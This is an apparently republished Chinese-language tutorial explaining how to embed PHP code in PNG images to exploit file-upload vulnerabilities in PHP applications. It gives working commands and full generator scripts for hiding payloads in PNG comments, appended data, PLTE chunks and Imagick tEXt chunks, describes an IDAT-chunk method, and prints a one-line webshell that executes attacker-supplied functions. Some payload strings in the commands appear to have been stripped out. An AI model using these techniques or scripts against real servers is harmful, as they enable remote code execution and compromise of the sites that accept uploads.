LOGO OA教程 ERP教程 模切知识交流 PMS教程 CRM教程 开发文档 其他文档  
 
网站管理员

黑客攻击时如何在PNG格式的图片中植入PHP代码

admin
2024年3月25日 0:39 本文热度 519

在评估PHP应用时候经常会遇到文件上传漏洞,该漏洞允许通过上传植入有PHP代码的文件来实现恶意代码植入,尤其是在图片上传漏洞中,常见的文件类型是PNG格式。

PNG图片的代码植入方式根据防护水平的不同而不同,有四类代码植入方式。





01

基础的PNG图片代码植入

基本的PNG图片上传不考虑任何的上传漏洞防护,很容易造成代码植入从而导致PHP任意代码执行。

如以下代码示例:

这段代码只是将上传的文件名通过添加唯一ID重命名文件,并将文件移动到可对外访问的目录下,即参数thumbnails_directory设定的目录下。

这段代码中只通过MIME做了文件格式的检查(通过文件内容检查判断文件格式),没有做文件后缀检查,因此只要文件内容与PNG格式吻合即可上传。

应对这种只有MIME文件格式检查的文件上传功能,可以通过在PNG图片中植入PHP代码来实现代码任意执行。

方法1:PNG注释

PNG图片格式允许添加注释到文件中,用于保存一些元数据。使用exiftool可以实现注释添加:

$ exiftool -comment="" png-hack-1.png

PNG文件后缀修改为PHP后上传,即可实现PHP代码任意执行。

方法2:直接附加

通过echo命令直接将PHP代码附加到文件末尾即可:

echo '' >> png-hack-1.png && mv png-hack-1.png png-hack-1.php




02

PHP-GD文件压缩代码植入

多数情况下图片文件被上传后会被裁剪、压缩甚至转换格式后存储,比如使用PHP-GD库。

下图的代码中使用PHP-GD库的imagecreatefrompng从原始文件创新新的文件,而后通过imagepng函数对PNG图片进行压缩(参数3中指定的level 9)后进行存储。

使用直接代码植入的PNG图片经过压缩后会失去植入的代码,从而导致漏洞利用失败。

方法3:PLTE块

PNG文件包含两种类型的块信息:附加数据块(ancillary chunks)和关键块(critical chunks),前者不是PNG文件的必需,后者是PNG文件的必要信息块。

无论使用哪种压缩方式进行文件压缩,都会删除附加数据块的内容以减小输出文件的大小,这也是直接将代码植入图片会无法奏效的原因。

所以,如果将代码植入到PNG文件的关键块中就可以避免压缩文件的影响,这里最佳的选择是关键块里的PLTE块(palette),比如颜色列表。

PLTE块包含1到256的调色板入口,每三个字节构成一组:

Red:   1 byte (0 = black, 255 = red)

Green: 1 byte (0 = black, 255 = green)

Blue:  1 byte (0 = black, 255 = blue)

入口的数量决定块的长度,但总长度是3的倍数。

所以理论上,利用PLTE块可以插入3*256,共768字节的代码,唯一的限制是payload必须被3整除。

<?php

 

if(count($argv) != 3) exit("Usage $argv[0] <PHP payload> <Output file>");

 

$_payload = $argv[1];

$output = $argv[2];

 

while (strlen($_payload) % 3 != 0) { $_payload.=" "; }

 

$_pay_len=strlen($_payload);

if ($_pay_len > 256*3){

    echo "FATAL: The payload is too long. Exiting...";

    exit();

}

if($_pay_len %3 != 0){

    echo "FATAL: The payload isn't divisible by 3. Exiting...";

    exit();

}

 

$width=$_pay_len/3;

$height=20;

$im = imagecreate($width, $height);

 

$_hex=unpack('H*',$_payload);

$_chunks=str_split($_hex[1], 6);

 

for($i=0; $i < count($_chunks); $i++){

    $_color_chunks=str_split($_chunks[$i], 2);

    $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));

 

    imagesetpixel($im,$i,1,$color);

}

 

imagepng($im,$output);

通过上面的payload程序生成构造的PLTE图片:
php gen.php '' nasa.php

上传nasa.php文件至文件上传,即可执行phpinfo()函数:

03

PHP-GD尺寸裁剪代码植入

另一种图片文件上传的标准操作是进行文件裁剪(resize)之后保存。应用程序可能会用到imagecopyresized函数或imagecopyresampled函数,比如以下代码:

重定义尺寸的图片不使用原图片中的关键块内容,比如PLTE块,而是新创建一个图片,且仅使用源文件中的像素数据,因此无论是关键块还是附加数据块在新图片中都不复存在。所以,只能将代码植入到源文件的像素数据中。

方法4:IDAT块

一个相对负载但有效的办法是将PHP代码植入到PNG文件的IDAT块,这些块中包含文件的真实数据,比如PNG的像素,以3个字节记录的RGB颜色轨道。创建IDAT块的时候,PNG线过滤器先处理3个字节的像素,而后使用DEFALTE算法进行压缩。

要创建包含PHP代码的PNG文件IDAT块,必须精确地知道PNG线过滤器和DFALTE算法的执行过程,而压缩的过程受到裁剪大小的影响。

以将110×110像素的PNG图片裁剪至55×55像素为例,并植入payload:

<?=$_GET[0]($_POST[1]);?>

使用以上payload生成代码执行生成恶意PNG图片:

php gen_idat_png.php > nasa.php

最终的效果如下:

通过IDAT构造恶意PNG图片可以有效应对尺寸裁剪的问题,但由于和裁剪尺寸相关,因此构造过程会非常棘手。






04

IMAGICK图片裁剪的代码植入

除了PHP-GD之外,应用程序还可以使用另一种裁剪方式进行图片裁剪,即ImageMagick的PHP版本Imagick。

使用Imagick进行图片处理的时候(比如thumbnailImage函数或resizeImage函数),看起来可以使用应对PHP-GD的方法来解决,比如PNG图片的注释或者PLTE块植入PHP代码。

然而,Imagick库可以使用另一种比IDAT方法更有效的方法。

方法5:tEXt块

tEXt chunks用于传达与图像相关的文本信息。每个文本块都包含一个关键字作为其第一个字段,以确定文本字符串所代表的信息类型。

PNG图片的注释部分其实是tEXt块中预定义的一种形式。在Imagick裁剪图片的时候,会执行以下操作:

  • 擦除tEXt块中的注释(comment);
  • 覆盖tEXt块中的以下值:

date:create, date:modify, software, Thumb::Document::Pages, Thumb::Image::Height, Thumb::Image::Width, Thumb::Mimetype, Thumb::MTime, Thumb::Size, Thumb::URI;

  • 保持tEXt块中的其他部分;

因此,可以将PHP代码植入到除了注释部分和覆盖部分的其他tEXt块中,比如下面的代码将植入代码到tEXt块中的Repoog属性,该属性是自定义的。

<?php

 

if(count($argv) != 4) exit("Usage $argv[0] <Input file> <PHP payload> <Output file>");

 

$input = $argv[1];

$_payload = $argv[2];

$output = $argv[3];

 

$imgck = new Imagick($input);

$imgck->setImageProperty("Repoog", $_payload);

$imgck->writeImage($output);

 

?>

然后执行该脚本生成恶意PNG图片:

php gen_tEXt_png.php png-hack-1.png '' nasa.php

最终的效果如下:

综上所述,不同PNG图片处理方式下的代码植入方式如下:


该文章在 2024/3/25 0:39:19 编辑过
关键字查询
相关文章
正在查询...
点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。
点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理,结合码头的业务特点,围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体,是物流码头及其他港口类企业的高效ERP管理信息系统。
点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。
点晴免费OA是一款软件和通用服务都免费,不限功能、不限时间、不限用户的免费OA协同办公管理系统。
Copyright 2010-2024 ClickSun All Rights Reserved